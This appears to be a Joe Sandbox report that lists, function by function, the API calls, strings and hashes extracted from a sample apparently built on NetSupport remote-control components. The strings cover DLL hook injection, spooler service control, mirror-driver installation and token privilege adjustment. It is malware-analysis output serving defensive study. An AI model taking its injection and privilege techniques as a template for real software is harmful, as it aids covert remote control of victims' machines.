                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2349140579-0
                                                                                                                        • Opcode ID: eb1f4f114d16a7cc5b40468e7f3b114276c43a74df61856477439d2ed0b7197e
                                                                                                                        • Instruction ID: 06f3493843f7b8f1fcf1785abc8208ad59f31788003f67b3e85bbdb791bb97ba
                                                                                                                        • Opcode Fuzzy Hash: eb1f4f114d16a7cc5b40468e7f3b114276c43a74df61856477439d2ed0b7197e
                                                                                                                        • Instruction Fuzzy Hash: 5E0108B2600208ABD710DF98DD49FAABBBCEF48701F10455DFA4597291DBF5A904CBA2
                                                                                                                        Function 00AFC0F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,?,00000000,00000000,?,00AFD67C,0000025E,cant create events), ref: 00AFC10C
                                                                                                                        • CloseHandle.KERNEL32(?,?,00AFD67C,0000025E,cant create events), ref: 00AFC115
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        • Opcode ID: dbb857cb872ad4e6eca5ac838e6464edd2ce09eab10d1089a30a3a2f5c95a958
                                                                                                                        • Instruction ID: 6f8b7451425f699e3192f5e610476f42b83340da705bcd21f893cb23c3c70cec
                                                                                                                        • Opcode Fuzzy Hash: dbb857cb872ad4e6eca5ac838e6464edd2ce09eab10d1089a30a3a2f5c95a958
                                                                                                                        • Instruction Fuzzy Hash: 40E0EC71200614ABD7388F55AD45FA273AC9F04B11F10061EF942D71C1CAB4E8408A68
                                                                                                                        Function 00B2D040 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 58c39780222df08044872804bb294191c8dcf6666db8626385027f3b6b1a0160
                                                                                                                        • Instruction ID: 381c2865486c0c128c465e8c3d4727c659fd78093c725580c5977e5cf6f72690
                                                                                                                        • Opcode Fuzzy Hash: 58c39780222df08044872804bb294191c8dcf6666db8626385027f3b6b1a0160
                                                                                                                        • Instruction Fuzzy Hash: 58F027B878422126EE3072647C13B7A25D2F714B04FC809F0FA1ECA2F6FEED59465256
                                                                                                                        Function 00B304C5 Relevance: 84.4, APIs: 36, Strings: 12, Instructions: 357librarysynchronizationsleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B30547
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B30560
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B3059B
                                                                                                                        • GetProcAddress.KERNEL32(?,MySetHook), ref: 00B305CB
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B305F3
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00B30607
                                                                                                                        • wsprintfW.USER32 ref: 00B3065C
                                                                                                                        • CreateEventW.KERNEL32(?,00000000,00000000,?), ref: 00B30674
                                                                                                                        • GetDesktopWindow.USER32 ref: 00B3068C
                                                                                                                        • SendMessageW.USER32(00000000), ref: 00B30693
                                                                                                                        • Sleep.KERNEL32(0000000F), ref: 00B3069B
                                                                                                                          • Part of subcall function 00AE9770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00AE9791
                                                                                                                          • Part of subcall function 00AE9770: GetWindowLongW.USER32(00000000,000000F0), ref: 00AE97A4
                                                                                                                          • Part of subcall function 00AE9770: DwmGetWindowAttribute.DWMAPI(00000000,0000000E,?,00000004), ref: 00AE97C2
                                                                                                                          • Part of subcall function 00AE9770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00AE9839
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000F), ref: 00B306C9
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,NSMViewPaused), ref: 00B30701
                                                                                                                        • IsWindow.USER32(?), ref: 00B30721
                                                                                                                        • GetClassNameW.USER32(?,?,00000080), ref: 00B3073C
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00B307BC
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00B307F8
                                                                                                                        • IsWindow.USER32(?), ref: 00B30811
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0000000F), ref: 00B30851
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00B30993
                                                                                                                          • Part of subcall function 00B30220: SendInput.USER32(00000002,?,0000001C), ref: 00B30287
                                                                                                                        • Sleep.KERNEL32(00000032), ref: 00B308B2
                                                                                                                        • IsWindow.USER32(?), ref: 00B308FE
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000F), ref: 00B3091A
                                                                                                                        • GetProcAddress.KERNEL32(?,MyUnhook), ref: 00B309C5
                                                                                                                        • GetDesktopWindow.USER32 ref: 00B309EC
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00B30A00
                                                                                                                        • OpenProcess.KERNEL32(00000600,00000000,?), ref: 00B30A19
                                                                                                                        • OpenProcess.KERNEL32(00000200,00000000,?), ref: 00B30A2E
                                                                                                                        • GetPriorityClass.KERNEL32(00000000), ref: 00B30A37
                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00B30A4C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Process$Wait$ClassEventObjectOpenSingle$AddressCreateDesktopFindLibraryLoadNamePriorityProcSendSleepThread$AttributeFileInputLongMessageModuleMultipleObjectsVisiblewsprintf
                                                                                                                        • String ID: Injecting...$Loaded %s$MySetHook$MyUnhook$NSMBlank_%p$NSMViewPaused$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s$\NSL\$winsthooks.dll
                                                                                                                        • API String ID: 1121615632-101993463
                                                                                                                        • Opcode ID: 2c087d1cf34d27de7bbeb5bb2718651e3f822207616a0f93c69787b54c1c08b5
                                                                                                                        • Instruction ID: 8461373cc07c06c5d7095705008be8a2c76bdc699f4caa4be0c28db242ef064a
                                                                                                                        • Opcode Fuzzy Hash: 2c087d1cf34d27de7bbeb5bb2718651e3f822207616a0f93c69787b54c1c08b5
                                                                                                                        • Instruction Fuzzy Hash: 24D1F3B19103159BEB30AB64DC99BAA73F8EF50704F1041D8E60DA72D2EBB49E84CF55
                                                                                                                        Function 00B232E0 Relevance: 80.7, APIs: 19, Strings: 27, Instructions: 226servicesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 00B23308
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2333A
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,spooler,00000034), ref: 00B2335C
                                                                                                                        • GetLastError.KERNEL32 ref: 00B23364
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B2338B
                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00B233D7
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B233F8
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B2340F
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B2341D
                                                                                                                        • GetLastError.KERNEL32 ref: 00B23455
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B23547
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B23561
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B2356C
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000E0), ref: 00B23595
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$ErrorLastQueryStatus$CloseHandleOpenSleepwsprintf$DirectoryLocalManagerStartSystemTime_mallocwvsprintf
                                                                                                                        • String ID: Attempt to start the service$Attempt to stop the service$ControlService failed with %d$START$STOP$Serivce isn't in Stopped state$Service Manager : %08x - %d$Service State : %d$Service is running$Service is stopped$Service isn't running$Service started ok$Service stopped ok$Servive failed to start after 60 seconds$Servive failed to stop after 60 seconds$StartService failed with %d$StartService ok$Use old method$\net$close service manager$close spooler service$hSpooler %08x - %d$spooler$spooler (%s)$spooler finished$start$stop
                                                                                                                        • API String ID: 361844234-1626732039
                                                                                                                        • Opcode ID: 20fcbc77927611a03c8a5a6f2567c8bfedcd7613cb8d8bd31b703b73d65352b7
                                                                                                                        • Instruction ID: 570be36a44cf20c8e81eeb820fd8c9914ee6d0f8bcd5b1b24a377f6d97ba58be
                                                                                                                        • Opcode Fuzzy Hash: 20fcbc77927611a03c8a5a6f2567c8bfedcd7613cb8d8bd31b703b73d65352b7
                                                                                                                        • Instruction Fuzzy Hash: 1371F870A412256BDB206B54BC86FBA72F8EF14F04F1040F4F41DA62A2DAB59F458B67
                                                                                                                        Function 00B2A810 Relevance: 72.0, APIs: 40, Strings: 1, Instructions: 273windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000421,0000000E,?,?), ref: 00B2A86D
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B2A87E
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B2A885
                                                                                                                        • GetDlgItemTextA.USER32(?,00000421,00B90F06,00000050), ref: 00B2A8C0
                                                                                                                        • GetDlgItemTextA.USER32(?,00000422,00B90EEA,0000000A), ref: 00B2A8EB
                                                                                                                        • GetDlgItemTextA.USER32(?,00000423,00B90EF4,00000006), ref: 00B2A8FA
                                                                                                                        • GetDlgItemTextW.USER32(?,00000424,?,00000050), ref: 00B2A90B
                                                                                                                        • LoadStringW.USER32(00AE0000,00000415,?,00000050), ref: 00B2A922
                                                                                                                        • GetDlgItemTextW.USER32(?,00000425,?,00000050), ref: 00B2A95C
                                                                                                                        • EndDialog.USER32(?,?), ref: 00B2A977
                                                                                                                        • GetDlgItem.USER32(?,0000042E), ref: 00B2A9C4
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2A9C7
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00B2A9CE
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2A9D1
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000421,000000CF,00000001,00000000), ref: 00B2A9E2
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000422,000000CF,00000001,00000000), ref: 00B2A9F7
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000423,000000CF,00000001,00000000), ref: 00B2AA0C
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000424,000000CF,00000001,00000000), ref: 00B2AA21
                                                                                                                        • GetDlgItem.USER32(?,00000425), ref: 00B2AA2F
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AA32
                                                                                                                        • GetDlgItem.USER32(?,00000431), ref: 00B2AA3C
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AA3F
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000421,000000C5,0000004F,00000000), ref: 00B2AA50
                                                                                                                        • SetDlgItemTextA.USER32(?,00000421,00B90F06), ref: 00B2AA61
                                                                                                                        • SetDlgItemTextA.USER32(?,00000422,00B90EEA), ref: 00B2AA72
                                                                                                                        • SetDlgItemTextA.USER32(?,00000423,00B90EF4), ref: 00B2AA83
                                                                                                                        • wsprintfW.USER32 ref: 00B2AAC7
                                                                                                                        • SetDlgItemTextW.USER32(?,00000424,?), ref: 00B2AADD
                                                                                                                        • GetDlgItem.USER32(?,00000422), ref: 00B2AAF4
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AAF7
                                                                                                                        • GetDlgItem.USER32(?,00000423), ref: 00B2AB01
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AB04
                                                                                                                        • GetDlgItem.USER32(?,00000424), ref: 00B2AB0E
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AB11
                                                                                                                        • GetDlgItem.USER32(?,00000425), ref: 00B2AB1B
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AB1E
                                                                                                                        • GetDlgItem.USER32(?,00000431), ref: 00B2AB28
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2AB2B
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B2AB41
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B2AB44
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Item$Window$ShowText$MessageSend$Enable$DialogLoadStringwsprintf
                                                                                                                        • String ID: %02d-%s-%d
                                                                                                                        • API String ID: 1251551559-2248033597
                                                                                                                        • Opcode ID: 82cd1c06b826f940c6b1c82291db2e6f29865f08bafd0d2634b2286e688ded05
                                                                                                                        • Instruction ID: 16d930ca559728c24b43e69606287428a4afd4773dae7bba8b44eeafa985ae0f
                                                                                                                        • Opcode Fuzzy Hash: 82cd1c06b826f940c6b1c82291db2e6f29865f08bafd0d2634b2286e688ded05
                                                                                                                        • Instruction Fuzzy Hash: FC8105B17817247FEA216B60AC4AFAF36ACEF85B00F404055F3056B0D1CEF85A41CA6A
                                                                                                                        Function 00B141D0 Relevance: 66.4, APIs: 44, Instructions: 414COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Pixel$Line$Move$Object$Select$CreateDelete
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3848591802-0
                                                                                                                        • Opcode ID: b91af70bd5d105304b652a49c59a6ee08054ec1903d0dd4a1e51e6d65c86a1de
                                                                                                                        • Instruction ID: cc32fbc9013756e3592a0be7892d4df3273ff8b085bbdb9259275f270b9f83d7
                                                                                                                        • Opcode Fuzzy Hash: b91af70bd5d105304b652a49c59a6ee08054ec1903d0dd4a1e51e6d65c86a1de
                                                                                                                        • Instruction Fuzzy Hash: 54D1C2B4610501BFE728DF68CD98D7BB7FDEBC9B10B10850DF996A3784CA74AC418A20
                                                                                                                        Function 00B14D70 Relevance: 59.8, APIs: 27, Strings: 7, Instructions: 291COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B14DA4
                                                                                                                        • _memset.LIBCMT ref: 00B14DB7
                                                                                                                        • wsprintfW.USER32 ref: 00B14DED
                                                                                                                        • _strrchr.LIBCMT ref: 00B14E31
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B14E57
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B14E61
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 00B14E83
                                                                                                                        • wsprintfW.USER32 ref: 00B14E92
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?), ref: 00B14EB8
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B14EC2
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?), ref: 00B14EE4
                                                                                                                        • wsprintfW.USER32 ref: 00B14F2C
                                                                                                                        • wsprintfW.USER32 ref: 00B14F39
                                                                                                                        • wsprintfW.USER32 ref: 00B14F47
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B14F94
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B14F9E
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 00B14FC0
                                                                                                                        • wsprintfW.USER32 ref: 00B14FD9
                                                                                                                        • wsprintfW.USER32 ref: 00B14FEE
                                                                                                                        • _strrchr.LIBCMT ref: 00B15051
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 00B15077
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B15081
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?), ref: 00B150A3
                                                                                                                        • wsprintfW.USER32 ref: 00B150B9
                                                                                                                        • wsprintfW.USER32 ref: 00B150D2
                                                                                                                        • wsprintfW.USER32 ref: 00B150DF
                                                                                                                        • wsprintfW.USER32 ref: 00B150ED
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$ByteCharMultiWide$__alloca_probe_16$_memset_strrchr
                                                                                                                        • String ID: (%d.%02d.%d.%d)$ + %d bytes$%p $%s + %d bytes$, %s, Line %d$<unknown module>$<unknown symbol>
                                                                                                                        • API String ID: 3451700745-3267890874
                                                                                                                        • Opcode ID: 5d3632474707647fb781c3f13c5f95aec72b35dc12192ddad21694cc931f8dca
                                                                                                                        • Instruction ID: 58a554c0d391746c8b6654859e3f0c35281e65b2898e735b89d8fc42732bf4c4
                                                                                                                        • Opcode Fuzzy Hash: 5d3632474707647fb781c3f13c5f95aec72b35dc12192ddad21694cc931f8dca
                                                                                                                        • Instruction Fuzzy Hash: 6AA12E71A00329ABDB25DB648C41FAAB3FCFB48704F5442D8B518A72D0DA75AF81CF94
                                                                                                                        Function 00AFEF40 Relevance: 54.6, APIs: 13, Strings: 18, Instructions: 361COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AFEFE9
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF0CD
                                                                                                                          • Part of subcall function 00AFFF40: GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,?,00000000), ref: 00AFFF66
                                                                                                                          • Part of subcall function 00AFFF40: GetProcAddress.KERNEL32(00000000), ref: 00AFFF6D
                                                                                                                          • Part of subcall function 00AFFF40: GetCurrentProcessId.KERNEL32(00000000), ref: 00AFFF83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$AddressHandleModuleProcProcessSystem
                                                                                                                        • String ID: Try again after removing the 'Block Unsigned Driver Policy'$DISPLAY$InstallGdihook5 ret %d$New mirror installation, e=%d$Unloadable mirror detected - update on reboot$Updategdihook5 err=x%x$Updategdihook5 ok$\gdihook5.dll$copy %s to %s failed$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$gdihook5.inf$mirror already installed$pci_gdihook5_hwid$rename %s to %s on reboot failed$rename %s to %s on reboot ok$using .inf=%s
                                                                                                                        • API String ID: 814484115-2657261969
                                                                                                                        • Opcode ID: f483bf61835cb0997a46ba8a525439a050db40b235d56439fe0aa28b06c37b1b
                                                                                                                        • Instruction ID: fc55e51b56c3167da8bb57e967dcbd0e40355e120435547f06e214929456895a
                                                                                                                        • Opcode Fuzzy Hash: f483bf61835cb0997a46ba8a525439a050db40b235d56439fe0aa28b06c37b1b
                                                                                                                        • Instruction Fuzzy Hash: 8CD17071D0121D9EEB209FA49C81FBAB3B4AF44704F1046F9FA09A6291EF745E84CF55
                                                                                                                        Function 00B00628 Relevance: 49.4, APIs: 19, Strings: 9, Instructions: 366COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00B00725
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: PathTemp
                                                                                                                        • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$ $%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$NOT copied to disk$Support\$copied to %s
                                                                                                                        • API String ID: 2920410445-1214151659
                                                                                                                        • Opcode ID: ed621af296d9e36cb0069df42f90b745790fbc054f2f606ecfaad93453f117ae
                                                                                                                        • Instruction ID: b08fc3293e357b47ec16a0380a796d936996c6638af5b63ca27bf4b0c0ba1ecf
                                                                                                                        • Opcode Fuzzy Hash: ed621af296d9e36cb0069df42f90b745790fbc054f2f606ecfaad93453f117ae
